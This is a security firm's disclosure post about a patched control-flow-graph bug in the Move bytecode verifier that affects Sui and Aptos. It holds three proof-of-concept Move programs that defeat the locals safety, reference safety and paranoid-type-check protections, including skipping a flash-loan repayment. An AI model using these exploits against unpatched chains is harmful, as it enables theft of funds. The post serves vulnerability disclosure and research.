Sometimes, you find what you’re looking for where you least expect.
Mysten Labs, the organization behind the Sui blockchain, contracted with us for a security assessment of their Layer 1 core. Specifically, we were tasked with securing Sui’s Move bytecode verifier before for their mainnet launch. The verifier is responsible for ensuring the core security properties of the Move VM are upheld. Interestingly, this verifier is shared among all Move-based blockchains, including Aptos ($2.1B market cap), Starcoin, and 0L.
Our assessment’s scope primarily focused on the bytecode verifier itself
and programmable transactions. However, the bug we found was in one of
the dependencies of this verifier. In providing a comprehensive
review, we decided to dig into these as well — after all, a good hacker
can never resist a nice rabbit hole. In the move-binary-format
crate,
which is shared across all Move implementations, we discovered a
critical, subtle, and novel bug relating to the verification of bytecode
control flow. This was the last place we would have expected to find
this kind of critical flaw!
In this blog post, we disclose this critical issue. This bug places potentially billions of dollars at risk. It would allow attackers to bypass the locals safety and reference safety verifier passes of the core Move verifier, plus the Sui-specific ID leak verifier (in which we previously discovered another bug↗). We will discuss the specific attack scenarios as well. Once again, this vulnerability impacted not only Sui but also other platforms using Move, including Aptos.
Ultimately, the bug would have allowed attackers to obtain multiple
mutable references to an object, retain a mutable reference to an object
that was moved, and to drop an object without the drop
ability. Move
is a language similar to Rust, and these are violations of Move’s most
fundamental security properties.
TL;DR: A subtle bug in the Move bytecode verifier allowed attackers
to bypass multiple security properties, potentially leading to
significant financial damages. The bug affected the construction of the
control flow graph (CFG) of a function. Exploits included dropping a
value without the drop
ability, bypassing the reference safety
verifier, and bypassing paranoid type checks. The issue was fixed, and
we collaborated closely with Mysten Labs during the disclosure process.
Move language primer
If you already know about Move and want to get directly to the details of the bug, click here to skip the introduction.
The Move language and virtual machine, originally designed for the now defunct Libra Project↗, bring interesting new ideas to the space. The language somewhat resembles Rust, having a similar syntax, strong static typing, and strong ownership with a borrow checker.
Modules (smart contracts in Move lingo) can define custom data types.
The contents of an instance can only be directly accessed by the code
that defined the type, meaning the fields of a custom type can be
trusted by default. Also by default, a module cannot copy or drop
(delete) an instance of a data type defined by another module, unless
the data type was defined with the copy
or drop
abilities.
This programming model is interestingly unique, as it allows to create
data types that have properties similar to a physical object; for
instance, Coin<T>
, the data type used to represent a token on Move
platforms, cannot be copied nor dropped, meaning it is not possible to
create a Coin
out of thin air nor to make a Coin
vanish by mistake.
As we will see, the inability to drop a value is also critical to the
secure operation of flash loans. Recall that flash loans essentially
provide untrusted users access to unsecured, “infinite” leverage for the
duration of an atomic transaction — thus, any mistakes in the operation
of a flash loan would be devastating.
For a comprehensive overview of the Move language, refer to The Move Book↗. You can also check out our two-part blog post on Move security: part 1↗ and part 2↗.
The Move verifier
Move source code is compiled to a bytecode that runs on the Move VM. The verifier’s job is to read and statically analyze bytecode to look for any loopholes that could bypass the Move security properties we discussed above. To be more technical, this means that before being published and run, the bytecode of a module is run through a set of verifier passes that ensure it does not violate any of the security properties defined in the Move programming model. The verification process is quite complex, involving a dozen verifiers, some of which are divided in smaller passes:
BoundsChecker::verify_module
LimitsVerifier::verify_module
DuplicationChecker::verify_module
SignatureChecker::verify_module
InstructionConsistency::verify_module
constants::verify_module
friends::verify_module
ability_field_requirements::verify_module
RecursiveStructDefChecker::verify_module
InstantiationLoopChecker::verify_module
CodeUnitVerifier::verify_module
- Control flow verifier
- Code unit verifier
- Stack usage verifier
- Type safety verifier
- Locals safety verifier
- Reference safety verifier
- Acquires list verifier
script_signature::verify_module
Verifier passes run on all individual functions in a module in the above order. Later verifiers only run if preceding ones found no errors. Explaining the whole verifier in all its complexity could easily fill a small book, and we certainly cannot fit all of it in this blog post.
If you want to know more about any individual pass, the source code↗ is a good reference. It contains comments on most passes, explaining what security invariants they enforce, and to the report of our audit↗. Should you find these topics fascinating, it’s also rewarding and worthwhile studying the field of static analysis↗ in general.
For this bug, we are interested in the locals safety and reference
safety subpasses of the CodeUnitVerifier
, since they are impacted by
the issue.
Locals safety verifier
This pass ensures that operations involving local variables are safe. It
prevents operations that would move, copy, or borrow an unavailable
local variable. It also prevents operations that would drop a local
variable value without the drop
ability by overwriting it or returning
from the function.
It is implemented via an abstract interpretation framework that keeps
track of the availability state of the local variables. Three states are
admitted: Unavailable
, Available
, and MaybeAvailable
. These states
represent the knowledge that a local variable is, respectively,
definitely unavailable (e.g., the value was moved), definitely available
(meaning the local variable certainly contains a value), or that it
might be available but not for certain. This last, partially
undetermined state is used to ensure values that might remain stored in
locals at the end of a function cannot be dropped unless they have the
drop
ability.
Function locals are used to store both function arguments, which start
in the Available
state, as well as local temporary variables, which
start as Unavailable
. The abstract interpretation machine iterates
over the control flow graph
(CFG↗), emulating the
effects of the instructions of every basic block to keep track of the
state of the local variables. This is done until a fixed point is
reached, which is guaranteed to happen due to how the transfer function
is defined and the properties of the CFG enforced by the control flow
verifier.
A fault in this pass could allow to use an unavailable local variable or
to drop values that don’t have the drop
ability.
Due to how the Move VM is currently implemented, trying to exploit the
former case would likely just cause a crash. This is because at runtime,
unavailable values are represented by ValueImpl::Invalid
to detect
faults in the verifier. A mitigation against the second consequence can
be enabled with the paranoid_type_checks
option of the verifier, which
introduces runtime checks that ensure the overwritten value has the
drop
ability.
Reference safety verifier
This pass ensures usage of references is safe; in other words, it enforces the Move data ownership model. More specifically, it checks that
- no mutable reference exists to a local value when it is copied
- no reference exists to a local value when it is taken (overwritten or dropped) or moved
- no immutable references are taken on a local value that is already mutably borrowed
- reads through a reference are permissible (always the case for immutable references; mutable references can be read only if they are freezable)
- writes through a reference are permissible (never the case for immutable references; mutable references can be written if there are no outstanding borrows)
Additional security properties regarding global values are also enforced. These are irrelevant for Sui, since instructions involving global storage cannot be used but are relevant to other chains, like Aptos.
The pass is implemented using an abstract interpretation↗ framework that keeps track of the outstanding mutable and immutable references while iterating on the CFG. While doing so, a graph representing the outstanding references is maintained and checked to make sure the properties described above hold.
The bug
We’re finally at the cool part. As we’ve seen, multiple verifier passes use the CFG of the function to perform abstract interpretation of the code and enforce security invariants.
The issue was located in a helper function and resulted in an incorrect
construction of the CFG of a function that lacked some edges. The CFG is
used by the above verifiers to ensure the code respects various security
properties; the missing CFG edge allowed to have pieces of code that
were effectively invisible to the verifier. Consequences of this include
the ability to obtain multiple mutable references to an object, retain
a mutable reference to an object that was moved, and to drop an object
without the drop
ability, breaking several fundamental Move security
properties.
The CFG of the function is constructed by
control_flow_graph.rs::VMControlFlowGraph
↗.
One of the first steps is to create the set of basic blocks of a
function, represented as a map using the basic block ID (its entry
point) as key, and containing its exit and the list of its successors as
value:
pub fn new(code: &[Bytecode]) -> Self {
// [...]
// Create basic blocks
let mut blocks = Map::new();
let mut entry = 0;
let mut exit_to_entry = Map::new();
for pc in 0..code.len() {
let co_pc = pc as CodeOffset;
// Create a basic block
if Self::is_end_of_block(co_pc, code, &block_ids) {
let exit = co_pc;
exit_to_entry.insert(exit, entry);
let successors = Bytecode::get_successors(co_pc, code);
let bb = BasicBlock { exit, successors };
blocks.insert(entry, bb);
entry = co_pc + 1;
}
}
// [...]
}
The bug lies in the
Bytecode::get_successors
↗
helper function. Can you spot it?
/// Return the successor offsets of this bytecode instruction.
pub fn get_successors(pc: CodeOffset, code: &[Bytecode]) -> Vec<CodeOffset> {
assert!(
// The program counter must remain within the bounds of the code
pc < u16::MAX && (pc as usize) < code.len(),
"Program counter out of bounds"
);
// Return early to prevent overflow if pc is hiting the end of max number of instructions allowed (u16::MAX).
if pc > u16::max_value() - 2 {
return vec![];
}
let bytecode = &code[pc as usize];
let mut v = vec![];
if let Some(offset) = bytecode.offset() {
v.push(*offset);
}
let next_pc = pc + 1;
if next_pc >= code.len() as CodeOffset {
return v;
}
if !bytecode.is_unconditional_branch() && !v.contains(&next_pc) {
// avoid duplicates
v.push(pc + 1);
}
// always give successors in ascending order
if v.len() > 1 && v[0] > v[1] {
v.swap(0, 1);
}
v
}
Were you able to spot it? If not, don’t worry. It is a very subtle issue and has gone unnoticed through countless code reviews.
The early return if pc > u16::max_value() - 2
is incorrect! This check
was mainly added to prevent against DoS if pc
is close to overflowing.
But there is a more dire consequence of this early return.
It means that the very last opcode in a function with 65,534 instructions will always have no successors. If the last opcode is a jump, there is a successor, but the CFG would return none.
As a result, any verifier pass using the successor list will not see one of the edges of the CFG. In practice, this means that the verifiers using the generic abstract interpretation machinery will not analyze some of the code, ignoring its effects on the state of the system and allowing to break the security invariants they should enforce.
Exploiting the bug
Multiple attacks are possible because of this bug, very likely leading
to extremely significant financial damages. For instance, a common
implementation of flash loans (on Aptos, “hot potatoes”) gives the
borrower an object that does not have the drop
ability, which must be
given back to the lender contract together with the lent funds and
interests in order to correctly finish the transaction. In other words,
an attacker could successfully take out a flash loan and not repay the
borrowed funds!
As we will see in one of the proof of concepts that follow, the security
of this system can be broken by bypassing the locals safety verifier.
The POCs can be run using the Move testing framework and were developed
on commit b47c1d895
. All proof of concepts include a comment that
specifies where padding instructions should be inserted so that the
function reaches length 65,534.
Note that to run the tests on Aptos, the return
padding instructions
need to be replaced with nop
s, because of an additional check limiting
the amount of basic blocks in a function, which does not prevent
exploitation of this bug in any meaningful way. However, there is no
convenient way to insert nop
s available in the pseudo-asm dialect used
by the Move test framework, and there is no way to compile a textual
representation of the exact bytecode either.
Locals safety verifier
This proof of concept demonstrates the ability to bypass the locals
safety verifier by dropping a value that does not have the drop
ability. Two instances of an object are obtained and stored in a local
variable. The first instance is overwritten with the second (which would
normally not be possible), and the second instance is then destroyed
using an intended function. This would have allowed to break hot potato
design, breaking almost all of currently implemented flash loans.
Note that dropping an object of which only one instance exists should also be possible in a similar fashion, for example by wrapping it into a vector and overwriting it with an empty vector of the same type.
//# publish --syntax=move
module 0x1::test {
struct HotPotato {
value: u32
}
public fun get_hot_potato(): HotPotato {
HotPotato { value: 42 }
}
public fun destroy_hot_potato(potato: HotPotato) {
HotPotato { value: _ } = potato;
}
}
//# run
import 0x1.test;
main() {
let hot_potato_1: test.HotPotato;
let hot_potato_2: test.HotPotato;
label padding:
jump end;
return;
// [LOTS OF RETURNS]
return;
label start:
hot_potato_1 = test.get_hot_potato();
hot_potato_2 = test.get_hot_potato();
hot_potato_1 = move(hot_potato_2);
test.destroy_hot_potato(move(hot_potato_1));
return;
label end:
jump start;
}
Reference safety verifier bypass
This second proof of concept demonstrates the ability to bypass the
reference safety verifier by invoking a hypothetical squash
function
that takes two mutable Coin
references and moves the value of the
second coin into the first. The function is instead invoked with two
mutable references to the same coin:
//# publish --syntax=move
module 0x1::balance {
struct Balance has drop {
value: u64
}
public fun create_balance(value: u64): Balance {
Balance { value }
}
public fun squash(balance_1: &mut Balance, balance_2: &mut Balance) {
let balance_2_value = balance_2.value;
balance_2.value = 0;
balance_1.value = balance_1.value + balance_2_value;
}
}
//# run
import 0x1.balance;
main() {
let balance_a: balance.Balance;
label padding:
jump end;
return;
// [PADDING RETURN STATEMENTS]
return;
label start:
balance_a = balance.create_balance(100);
balance.squash(&mut balance_a, &mut balance_a);
return;
label end:
jump start;
}
Paranoid type checks
Additional runtime security checks can be enabled on the Move VM by
setting the paranoid_type_checks
option. The checks are quite
effective at preventing most trivial exploits, resulting in a runtime VM
error.
For instance, they seem to always detect when an object without the
drop
ability is dropped. However, they are insufficient to guard
against all possible exploits, as demonstrated in our third proof of
concept.
Paranoid type checks bypass
This proof of concept demonstrates how it is possible to push a mutable
reference to an object and the object itself to the virtual machine
stack. This allows us to pass the object to some other function while
retaining a mutable reference to it. This proof of concept simulates a
payment by invoking a function that takes a Balance
object and then
stealing back the transferred value by using the mutable reference.
The most straightforward way to obtain a reference in Move would be to
store the object in a local variable and then to take a reference to it.
Using this method to push both a mutable reference and the instance of
the target object on the stack is not feasible due to runtime checks
independent from the verifier and from the separate
paranoid_type_checks
.
Execution of the MoveLoc
instruction to move the local variable to the
stack will cause an error in values_impl.rs::swap_loc
; the function
checks that the reference count of the object being moved is at most
one. Since taking a mutable reference increases the reference count, it
not possible to move a local variable for which a reference exists.
This proof of concept shows one of the possible bypasses to this limitation. The broken state is achieved by packing the victim object in a vector, taking a reference to the object, and then pushing the object to the stack by unpacking the vector. This strategy allows to get a mutable reference to the object without it being stored directly in a local variable, bypassing the check.
//# publish --syntax=move
module 0x1::test {
struct Balance has drop {
value: u64
}
public fun balance_create(value: u64): Balance {
Balance { value }
}
public fun balance_value(balance: &Balance): u64 {
balance.value
}
public fun pay_debt(balance: Balance) {
assert!(balance.value >= 100, 234);
// Here we are dropping the balance
// In reality it would be transferred, the payment marked as done, etc
}
public fun balance_split(self: &mut Balance, value: u64): Balance {
assert!(self.value >= value, 123);
self.value = self.value - value;
Balance { value }
}
}
//# run
import 0x1.test;
main() {
let v: vector<test.Balance>;
let bal: test.Balance;
label padding:
jump end;
return;
// [padding returns]
return;
label start:
bal = test.balance_create(100);
v = vec_pack_1<test.Balance>(move(bal));
// Stack at this point: <empty>
// Pushes a mutable reference to the balance on the stack
vec_mut_borrow<test.Balance>(&mut v, 0);
// Stack at this point: &mut balance
// Pushes the balance instance by unpacking the vector
vec_unpack_1<test.Balance>(move(v));
// Stack at this point: &mut balance, balance
// Pay something (implicitly using the balance on top of the stack as argument)
test.pay_debt();
// Stack at this point: &mut balance
// We still have the mutable reference to the balance, let's steal from it
(100); // Push 100 on the stack
bal = test.balance_split();
// Stack at this point: <empty>
assert(test.balance_value(&bal) == 100, 567);
return;
label end:
jump start;
}
Timeline and response
We report some significant events regarding this issue. Mysten Labs contracted us to review the bytecode verifier, and we discovered this issue. It affected all the other Move language chains as well (Aptos, Starcoin, 0L). We maintained an (unofficial) internal embargo to mitigate the risk of this issue being released to the public before a patch was deployed as much as possible. However, some security researchers have noticed and publicly disclosed↗ the issue from the commit fixes.
- October 6, 2022: The issue is introduced in commit
8bddbe65
↗ - March 25, 2023: Issue is first reported to Mysten Labs
- We are informed by Mysten Labs that they would also share the details of the issue with developers of other Move-based platforms
- March 30, 2023: Commit
d2bf6a3c
↗ silently fixing the issue is introduced in Sui branch of Move - March 31, 2023: Aptos Node Hotfix Release v1.3.3
- This release has no release notes nor source code available; we suspect it contains the fix, but we were not informed by Aptos about it
- April 10, 2023: Commit
1fa4ed20
↗ explicitly fixes the issue in Aptos branch of Move- At present (April 12), this commit was not yet included in Aptos vendored fork of Move↗
We mainly communicated with Mysten Labs to disclose this vulnerability. While we inquired about the possibility of receiving a bug bounty from Aptos for this vulnerability, they declined our request, citing the context in which the vulnerability was discovered — namely that it was discovered while performing an audit for Mysten Labs. We understand their perspective and appreciate their commitment to security.
Conclusion
The Move bytecode verifier bug, introduced on October 6th, 2022, and
silently fixed on March 30th, 2023, in the Sui branch, allowed attackers
to bypass multiple security properties, leading to potentially
significant financial damages. The bug was subtle and resided in the
Bytecode::get_successors
helper function, resulting in an incorrect
construction of the CFG of a function.
Proof of concepts demonstrated the possibility of dropping a value
without the drop
ability, bypassing the reference safety verifier and
bypassing paranoid type checks. Although the paranoid type checks
offered some additional protection, they were insufficient to guard
against all possible exploits.
Aptos and other Move-based platforms worked to fix the issue. We look forward to continuing our productive partnership and working together to ensure the highest level of security for all stakeholders in the Move ecosystem.
About Us
Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.
Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.
Contact us↗ for an audit that’s better than the rest. Real audits, not rubber stamps.